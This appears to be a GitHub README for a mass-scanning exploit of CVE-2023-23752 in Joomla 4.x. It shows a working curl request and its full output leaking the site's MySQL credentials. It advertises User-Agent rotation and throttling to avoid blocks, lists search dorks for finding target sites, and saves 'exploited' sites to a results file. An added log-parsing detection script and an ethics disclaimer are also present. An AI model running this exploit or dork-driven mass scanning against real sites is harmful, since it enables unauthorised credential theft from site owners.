Exploit for CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7).
As discussed, CVE-2023-23752 is an authentication bypass resulting in an information leak. Most of the public exploits use the bypass to leak the system's configuration, which contains the Joomla! MySQL database credentials in plaintext. The following demonstrates the leak:
$ curl -v http://10.9.49.205/api/index.php/v1/config/application?public=true
* Trying 10.9.49.205:80...
* TCP_NODELAY set
* Connected to 10.9.49.205 (10.9.49.205) port 80 (#0)
> GET /api/index.php/v1/config/application?public=true HTTP/1.1
> Host: 10.9.49.205
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 20 Mar 2023 15:14:05 GMT
< Server: Apache/2.4.41 (Ubuntu)
< x-frame-options: SAMEORIGIN
< referrer-policy: strict-origin-when-cross-origin
< cross-origin-opener-policy: same-origin
< X-Powered-By: JoomlaAPI/1.0
< Expires: Wed, 17 Aug 2005 00:00:00 GMT
< Last-Modified: Mon, 20 Mar 2023 15:14:05 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Content-Length: 1983
< Content-Type: application/vnd.api+json; charset=utf-8
<
{"links":{"self":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true","next":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20","last":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20"},"data":[{"type":"application","id":"224","attributes":{"offline":false,"id":224}},{"type":"application","id":"224","attributes":{"offline_message":"This site is down for maintenance.<br>Please check back again soon.","id":224}},{"type":"application","id":"224","attributes":{"display_offline_message":1,"id":224}},{"type":"application","id":"224","attributes":{"offline_image":"","id":224}},{"type":"application","id":"224","attributes":{"sitename":"vulncheck","id":224}},{"type":"application","id":"224","attributes":{"editor":"tinymce","id":224}},{"type":"application","id":"224","attributes":{"captcha":"0","id":224}},{"type":"application","id":"224","attributes":{"list_limit":20,"i* Connection #0 to host 10.9.49.205 left intact
d":224}},{"type":"application","id":"224","attributes":{"access":1,"id":224}},{"type":"application","id":"224","attributes":{"debug":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang_const":true,"id":224}},{"type":"application","id":"224","attributes":{"dbtype":"mysqli","id":224}},{"type":"application","id":"224","attributes":{"host":"localhost","id":224}},{"type":"application","id":"224","attributes":{"user":"root","id":224}},{"type":"application","id":"224","attributes":{"password":"labpass1","id":224}},{"type":"application","id":"224","attributes":{"db":"joomla_db","id":224}},{"type":"application","id":"224","attributes":{"dbprefix":"xj3n0_","id":224}},{"type":"application","id":"224","attributes":{"dbencryption":0,"id":224}},{"type":"application","id":"224","attributes":{"dbsslverifyservercert":false,"id":224}}],"meta":{"total-pages":4}}
In the proof of concept above, the server responds with the credentials root:labpass1, which are the credentials for our test Joomla! MySQL account. But it’s important to know that our test MySQL server was bound to 127.0.0.1, so the remote attacker can’t access the server, making the credentials mostly useless. Binding MySQL to the localhost should be the most common configuration, which severely limits this credential leak.
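From the defender's side, the request shown in the proof of concept above leaves a distinctive trace in the web server's access log. The following script is an added example, not code from this repository, that parses combined-format access-log lines, flags requests for the `config/application` endpoint with `public=true` (including paginated follow-ups such as the `next` link in the response above and installs under a sub-path), and counts per client address how many of those were answered with HTTP 200, i.e. how many times the configuration was actually served. The log lines, client addresses and status codes are constructed for the example; the combined log format and the 200-means-served assumption are assumptions of the example, not statements from the page.

```python
"""
Added example (not part of the Pushkarup/CVE-2023-23752 project): find
requests to the Joomla! API endpoint abused by CVE-2023-23752 in
combined-format access logs and report which clients hit it and how often.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format (assumed):
# ip - user [time] "METHOD target HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Endpoint path leaked by the bypass, as shown in the PoC above.
LEAK_PATH = "/api/index.php/v1/config/application"

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Mar/2023:15:14:05 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1983 "-" "curl/7.68.0"',
    '203.0.113.7 - - [20/Mar/2023:15:14:06 +0000] "GET /api/index.php/v1/config/application?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20 HTTP/1.1" 200 1750 "-" "curl/7.68.0"',
    '198.51.100.9 - - [20/Mar/2023:15:20:11 +0000] "GET /index.php/component/content/?view=featured HTTP/1.1" 200 12034 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [20/Mar/2023:15:21:02 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 401 271 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [20/Mar/2023:15:22:40 +0000] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "curl/7.68.0"',
]


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_config_leak_request(target):
    """True if the request target is the config endpoint with public=true.

    The path is matched by suffix so that a Joomla! install under a
    sub-path (e.g. /joomla/api/...) is still recognised, and the query
    string is parsed so extra parameters (pagination) do not hide the hit.
    """
    parts = urlsplit(target)
    path = unquote(parts.path)
    if not path.endswith(LEAK_PATH):
        return False
    qs = parse_qs(parts.query)
    return qs.get("public", [""])[0].lower() == "true"


def scan_log(lines):
    """Return (hits, served_per_ip).

    hits          - parsed records of every request for the leak endpoint,
                    whatever the status (attempts against patched sites are
                    still worth recording)
    served_per_ip - Counter of client addresses that received HTTP 200,
                    i.e. the configuration was most likely handed out
    """
    hits = []
    served_per_ip = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_config_leak_request(rec["target"]):
            continue
        hits.append(rec)
        if rec["status"] == "200":
            served_per_ip[rec["ip"]] += 1
    return hits, served_per_ip


if __name__ == "__main__":
    hits, served = scan_log(SAMPLE_LOG)
    print(f"{len(hits)} request(s) for {LEAK_PATH} with public=true")
    for ip, n in served.most_common():
        print(f"  {ip}: configuration served {n} time(s)")
    for rec in hits:
        print(f"  {rec['time']} {rec['ip']} -> {rec['status']} {rec['target']}")
```

Run it as-is to see the constructed sample scored, or feed it real lines with `scan_log(open("access.log"))`. A client that received a 200 for this endpoint on an unpatched site should be treated as having the database credentials, which is the point of the paragraph above: whether that matters depends on whether MySQL is reachable from outside.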
This Exploit and Proof of Concept (PoC) is presented solely for educational and informational purposes. The intent behind sharing this is to demonstrate potential vulnerabilities in a controlled environment. The goal is to promote understanding of cybersecurity concepts and encourage responsible disclosure.
- Ethical Use: This Exploit and PoC should only be used in environments and systems where you have explicit authorization. Unauthorized access to computer systems is illegal and unethical.
- Responsible Disclosure: If you discover vulnerabilities as a result of this Exploit and PoC, it is strongly recommended to report them responsibly to the relevant parties, allowing them adequate time to address and mitigate the issues.
- No Endorsement: This PoC and related materials do not endorse or encourage any form of unauthorized access, hacking, or any other illegal activities.
By accessing and using this Exploit and PoC, you acknowledge that you are solely responsible for your actions and agree to use this information in compliance with applicable laws and regulations. The author assumes no liability for any misuse or consequences arising from the use of this PoC for any purpose other than education and responsible disclosure.
- SINGLE SCAN: Scan a single site for the exploit.
- MASS SCAN: Scan a list of sites read from a file.
- ASYNCHRONOUS Threading: Use threads for fast processing.
- DYNAMIC THROTTLING: Throttle the request rate dynamically to avoid sending too many requests in a short time, which helps avoid getting blocked.
- RESULT SUMMARISATION: Summarise the findings at the end of the scan: successful scans, unsuccessful scans, and any problems that were detected.
- INPUT VALIDATION: Validate user inputs, particularly those read from files, to make sure they are correctly structured and contain legitimate URLs.
- USER-AGENT ROTATION: Rotate the User-Agent header for each request to mimic different browsers and reduce the chance of being blocked.
- Python 3.x
- Required Python packages: requests, colorama, urllib3, fake_useragent, aio-http
- Clone the repository:
  git clone https://github.com/Pushkarup/CVE-2023-23752.git
  cd CVE-2023-23752
- Install the required Python packages:
  pip install -r requirements.txt
- Create a text file containing the target sites (one per line) and save it with a .txt extension.
- Collect a site list for testing using dorks:
  inurl:/api/index.php/v1/config/application?public=true
  intitle:"Index of" /api/index.php/v1/config/application?public=true
  filetype:php inurl:/api/index.php/v1/config/application?public=true
  intitle:"Index of" AND intext:"config" AND intext:"application" AND intext:"public=true"
- Run the script:
  python joomla.py
- Let the script run its course and follow the directions.
- Every site that has been exploited will be stored in Results.txt.
Contributions are welcome! If you find any issues or have improvements, feel free to open a pull request or create an issue.
This project is licensed under the MIT License.
- GitHub: Pushkar Upadhyay
- LinkedIn: Pushkar Upadhyay
- BTC: 3QqVBBzDBezA9U77PCTwMPQVGb1eecv2SP
- ETH: 0xB779767483831BD98327A449C78FfccE2cc6df0a
- USDT: 0xB779767483831BD98327A449C78FfccE2cc6df0a